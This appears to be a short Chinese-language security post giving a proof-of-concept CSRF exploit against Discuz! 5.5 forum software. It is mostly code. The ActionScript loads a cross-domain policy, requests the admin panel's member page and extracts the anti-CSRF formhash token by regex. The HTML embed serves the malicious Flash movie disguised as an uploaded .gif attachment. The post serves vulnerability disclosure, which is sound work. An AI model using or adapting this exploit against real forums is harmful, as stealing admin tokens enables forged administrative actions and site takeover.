Discuz! flash csrf vul

                                                POC[测试Discuz!5.5 其他版本的请自己编写]如下:

flash的原文件:http://www.80vul.com/dzvul/sodb/01/sodb-2008-02.fla

as代码如下:

import RegExp;
System.security.loadPolicyFile("http://www.80vul.com/bbs/crossdomain.xml");


var xml:XML = new XML();
xml.onData = function(s) {
    tb1.text =  getFirstMatch(new RegExp("<input type=\"hidden\" name=\"formhash\" value=\"(\\w+)\" />", "ig"), s, 1);
}
System.security.loadPolicyFile("http://www.80vul.com/bbs/crossdomain.xml");
xml.load("http://www.80vul.com/bbs/admincp.php?action=members");

function getFirstMatch(re, s, i) {
	var m = null;
	if ((m = re.exec(s)) != null) {
		return m[i];
	}
}



远程调用的html:

<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,0,0" width="550" height="400"><param name="allowScriptAccess" value="sameDomain"><param name="movie" value="http://www.80vul.com/bbs/attachments/month_0810/20081030_a293d131d2da23ead5805QYWvs5tkBpi.gif"><param name="quality" value="high"><param name="bgcolor" value="#ffffff"><embed src="http://www.80vul.com/bbs/attachments/month_0810/20081030_a293d131d2da23ead5805QYWvs5tkBpi.gif" quality="high" bgcolor="#ffffff" allowscriptaccess="sameDomain" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" width="550" height="400"></object>